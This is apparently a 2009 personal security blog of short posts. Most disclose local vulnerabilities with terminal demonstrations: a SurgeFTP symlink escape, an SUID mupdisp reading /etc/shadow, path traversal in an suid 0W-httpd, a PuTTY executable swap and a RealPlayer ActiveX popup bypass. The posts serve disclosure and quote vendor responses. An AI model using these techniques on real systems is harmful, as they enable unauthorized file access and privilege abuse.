Breaking Out in SurgeFTP

There is a funny bug SurgeFTP that allows users to break out of their home directory.

SurgeFTP will follow symbolic links, so exploiting this is as easy as being able to create links to directories of your choosing.

rush@ubuntu:~$ ftp example
Connected to example.
220 SurgeFTP example (Version 2.3a6)
Name (example:rush): test
331 Password required for test.
Password:
230-  Alias                Real path                      Access
230-  /                    /home/test                     read+write
230 User test logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
150 Opening BINARY connection for /
-rw-------   1 test     test           75 Jun  4 22:09 .bash_history
-rw-r--r--   1 test     test          220 Jun  4 22:07 .bash_logout
-rw-r--r--   1 test     test         3115 Jun  4 22:07 .bashrc
-rw-r--r--   1 test     test          675 Jun  4 22:07 .profile
lrwxrwxrwx   1 test     test         4096 Jun  4 22:09 fs -> /
226 Transfer complete. 
ftp> cd fs
250 CWD command successful now (/fs)
ftp> pwd
257 "/fs" is current directory.
ftp> ls
200 PORT command successful.
150 Opening BINARY connection for /fs
drwxr-xr-x   2 root     root         4096 May 15  0:10 bin
drwxr-xr-x   3 root     root         4096 May 15 13:34 boot
lrwxrwxrwx   1 root     root         4096 Apr 28 12:02 cdrom -> media/cdrom
drwxr-xr-x   3 root     root         4096 May 22 14:32 debian
drwxr-xr-x  15 root     root         3800 Jun  4 13:11 dev
drwxr-xr-x 160 root     root        12288 Jun  4 22:07 etc
drwxr-xr-x   6 root     root         4096 Jun  4 22:07 home
lrwxrwxrwx   1 root     root      7534504 May 15  0:25 initrd.img -> boot/initrd.img-2.6.28-11-generic
lrwxrwxrwx   1 root     root      8220906 Apr 28 12:34 initrd.img.old -> boot/initrd.img-2.6.27-7-generic
drwxr-xr-x  20 root     root        12288 May 22 14:18 lib
drwx------   2 root     root        16384 Apr 28 12:01 lost+found
drwxr-xr-x   3 root     root         4096 Oct 29  2008 media
drwxr-xr-x   2 root     root         4096 Oct 20  2008 mnt
drwxr-xr-x   3 root     root         4096 May 29  1:18 opt
dr-xr-xr-x 153 root     root            0 Jun  4 13:09 proc
drwxr-xr-x  13 root     root         4096 May 22 16:43 root
drwxr-xr-x   2 root     root         4096 May 15 20:09 sbin
drwxr-xr-x   2 root     root         4096 Mar  6 11:21 selinux
drwxr-xr-x   2 root     root         4096 Oct 29  2008 srv
drwxr-xr-x  12 root     root            0 Jun  4 13:09 sys
drwxrwxrwt  17 root     root        20480 Jun  4 21:50 tmp
drwxr-xr-x  12 root     root         4096 May 22 14:18 usr
drwxr-xr-x  16 root     root         4096 May 22 14:10 var
lrwxrwxrwx   1 root     root      3501776 May 15  0:25 vmlinuz -> boot/vmlinuz-2.6.28-11-generic
lrwxrwxrwx   1 root     root      2244272 Apr 28 12:34 vmlinuz.old -> boot/vmlinuz-2.6.27-7-generic
226 Transfer complete. 
ftp> cd /
250 CWD command successful now (/)
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
150 Opening BINARY connection for /
-rw-------   1 test     test           75 Jun  4 22:09 .bash_history
-rw-r--r--   1 test     test          220 Jun  4 22:07 .bash_logout
-rw-r--r--   1 test     test         3115 Jun  4 22:07 .bashrc
-rw-r--r--   1 test     test          675 Jun  4 22:07 .profile
lrwxrwxrwx   1 test     test         4096 Jun  4 22:09 fs -> /
226 Transfer complete. 
ftp> bye
221 Closing connection - goodbye!
rush@ubuntu:~$

Since the user would have to be able to make the links in the first place (probably using a shell), so risk is low in most circumstances.

Vendor Response:

Thanks for reporting this, here is a new build
       http://netwinsite.com/ftp/misc/surgeftp_23a10_linux.tar.gz

This has a new setting
       global_nosymlink "true"
which you can turn on to disable this behaviour.

Much better than nothing :)

Mup Local Arbitrary File Disclosure

"Mup is a shareware program for printing music."

% grep -B1 4755 mup-5.6/makefile
 # For Linux console mode support, uncomment the following line
 # chown root $(BINDIR)/mupdisp ; chmod 4755 $(BINDIR)/mupdisp
% ls -al /usr/bin/mupdisp
-rwsr-xr-x  1 root root 815245 2009-05-26 15:57 /usr/bin/mupdisp
% /usr/bin/mupdisp /etc/shadow
Mupdisp - Version 5.6
Mup - Music Publisher   Version 5.6
Copyright (c) 1995-2009 by Arkkra Enterprises.
All rights reserved.

/etc/shadow: line 1:
    root:$1$k.XXXXXXXXXXXXXXXXXXXXXXXXXX:14360:0:99999:7:::
.....
stopping due to previous errors
%

Reading the first line of the grep output tells us that mupdist...

--> "mupdisp runs Mup and then runs GhostScript on the result."

will be SUID root if the user enables "Linux console mode support".

Vendor Response:

"The tgz version already does not use setuid, so there should be no issue
for people installing from that, unless they explicitly choose to change
the mode.  The same is true for anyone compiling for themselves.
We will change the rpm spec file to not do setuid.  We can also suggest
using sudo rather than setuid, which is a better alternative that was
not available yet at the time mupdisp was originally written."

This came after explaining that a workaround != fix. Oh dear.

Leet Trip Odometer

I stopped to check the mail and barely got a snapshot of this.. haha



In case your blind, my trip odometer reads "1337" (it was turning to 1338, I tried to stop as fast as I could)! How cool is that? :D

SQL Injection is Dangerous

Apparently.. because attackers used a sql injection flaw in the administration panel at domainz.net to deface the highest of high profile .nz and .pr websites. Zone-H has got the full story.

Google and Gmail, Microsoft, MSN, MSDN, and Hotmail, Sony, Dell, and even Paypal weren't spared.

I'm not a fan of defacements but this is shocking. Even though they got lucky and exploited the administation panel, which is far from a leet hack.. well, this still isn't too bad. Its not like they broke the servers themselves, but they changed the DNS records. There is a certain beauty in carefully crafted code, spawning a shell and breaking root.. but, yeah, easy works too.



Its been that time for a while for us to think outside the box any way we can. Hacking is delicious.

Go Go GrabIt!

After seeing this advisory for my favorite win32 newsgroup software, I had to check it out. Before I had time to write a proper exploit, however, someone, as usual, had posted a low quality soon thereafter. Right... Well mine should win any race with the first near proof of concept anyways.




milw0rm was kind enough to host it for me -> here

I was poking around some ports on my freebsd box and found a privileged partial read via the configuration file flag in 0W-httpd (ZeroWait httpd).. too bad its only suid+sgid www.

[root@freebsd /tmp]# ls -al /usr/local/sbin/0W-httpd
-rwsr-sr-x  1 www  www  111100 May  5 15:50 /usr/local/sbin/0W-httpd
[root@freebsd /tmp]# echo "www's-eyes-only" > secret
[root@freebsd /tmp]# chown www:www /tmp/secret
[root@freebsd /tmp]# chmod 700 /tmp/secret
[root@freebsd /tmp]# exit
exit
[rush@freebsd ~]$ cat /tmp/secret
cat: /tmp/secret: Permission denied
[rush@freebsd ~]$ /usr/local/sbin/0W-httpd -f -c ../../../../tmp/secret
16:00:54|httpd| cannot create directory logs/2009-05-05: No such file or directory
16:00:54|httpd| cannot create directory logs/2009-05-05: No such file or directory
16:00:54|httpd| 53677 is starting to work
16:00:54|httpd| unknown option `www's-eyes-only'
16:00:54|httpd| config error at www's-eyes-only (/usr/local/etc/0W-httpd//../../../../tmp/secret:1)
16:00:54|httpd| 53677 is exited due to some init error
[rush@freebsd ~]$

Practical Insecurity

A thousand words, indeed.

I also discovered something funny about PuTTY.. you could trick a local user into launching another executable if they choose to duplicate their session.

A scenario would go something like this (ex. putty.exe -> Desktop):

* Target launches PuTTY and opens a session.

* Some time later an attacker manages to move to putty.exe somewhere off the Desktop (while the session is open) and replaces it with ANOTHER executable, named putty.exe.

* Target comes back and decides they need a duplicate session ("Duplicate Session" on the menu). But instead of a duplicate session, the attacker's executable is launched, and we all know how that works...

Probably not very useful for much of anyone.. just something funny about how PuTTY's functionality.

I'm excited to announce the release of Hzzp for Monday, April 27th 2009. After countless hours of bug hunting, this valuable fuzzing tool has served it purpose well. After a near rewrite and restruction of Hzzp, its ready for public release at Krakow Labs tomorrow.

Happy Fuzzing :)

Pop-up Blockers VS Realplayer

I guess these days are different than those of which Pop-up blockers were still relevant. Because of the built-in protection most major web browsers offer, the era of those beastly applications has declined, if not been forgotten.

Bug hunting in ActiveX controls has left the field nearly extinct for most software, but not all of course. Not that I'm saying there aren't any more bugs out there, but there are far fewer than ever before. An interesting "issue" (not much in the way of security issue) is in Realplayer's ierpplug.dll. The control associated with ierpplug.dll (FDC7A535-4070-4B92-A0EA-D9994BCC0DC5) contains a method called "OpenURLInPlayerBrowser". As you might have figured, we can open any URL in Realplayer using this function.

Now, not that any Pop-up blockers were designed to deal with this, because I doubt they were or they would have, but we can bypass them and get Realplayer to open URLs for us. That means most websites that IE will open (Realplayer basically uses IE), Realplayer can open as well.

Its as easy as...

activex.OpenURLInPlayerBrowser url



Nothing special, it just may come in handy sometime.